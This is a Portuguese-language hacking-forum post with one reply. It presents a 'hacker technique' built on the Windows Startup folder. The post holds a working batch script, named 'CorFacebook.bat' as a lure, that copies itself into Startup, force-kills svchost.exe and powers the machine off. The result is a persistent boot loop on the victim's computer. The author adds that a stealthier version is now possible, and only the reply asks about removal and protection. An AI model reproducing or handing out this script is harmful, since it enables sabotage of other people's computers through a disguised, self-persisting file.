Ir para conteúdo
Lord13

[DICA] [TÉCNICA HACKER] Vulnerabilidade Simples do Windows

Recommended Posts

Hoje vou iniciar ensinando como funciona o pensamento hacker, vou mostrar um exemplo simples de como encontrar vulnerabilidades. Eu não sou hacker, não por falta de querer, mas por que eu quero aprender  que é a vulnerabilidade e como funcionam as redes para então saber como hackear.

A definição de hacker é sempre reforçada no fórum e no grupo, hacker não é aquele que sabe hackear, ou que manja de TI. É aquele indivíduo que compreende realmente à fundo algum assunto. Você pode saber como funciona o olfato à ponto de conseguir modificar cheiros à seu gosto, pode saber como funciona a mente à ponto de poder enganar alguém, pode saber como funciona um carro à ponto de saber como melhorar o desempenho... ou pode saber como funcionam redes à ponto de poder invadir essas redes e sistemas....

E quando eu era mais novo, eu sabia os comandos mais simples do Windows (desligar, copiar, renomear arquivos/pastas, terminar processos, etc.)  e depois eu "descobri" que existe uma pasta no Windows que permite que tudo que esteja lá seja iniciado junto com o sistema (que fácil, não?)... por que não criar um script que desligue o computador toda vez que ele liga? Por que não criar um script que interrompa processos importantes somente ao ligar? E foi isso que e fiz...

Eu sabendo disso, pensei nisso e testei em meu computador, e não é que deu certo? Como eu sabia como deletar, eu apaguei antes de ele rodar.

O que eu fiz foi um script simples que se copia para a pasta de inicialização...

Batch Code:

@echo off
cls
copy "CorFacebook.bat" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
taskkill /im svchost.exe /f
shutdown /p

Salvei o arquivo como "CorFacebook.bat", e é só rodar... Claro que foi quando eu não sabia de nada, hoje eu posso criar um script mais escondido... que não confirmação pra copiar.

Hail Fsociety

Compartilhar este post

Link para o post
Compartilhar em outros sites

Muito bom!!!!!

Seria uma boa se você ensinasse a como remover, quais os perigos, como se proteger.

Foi só uma dica! Se não quiser explicar pode deixar que eu explico xD.

Compartilhar este post

Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.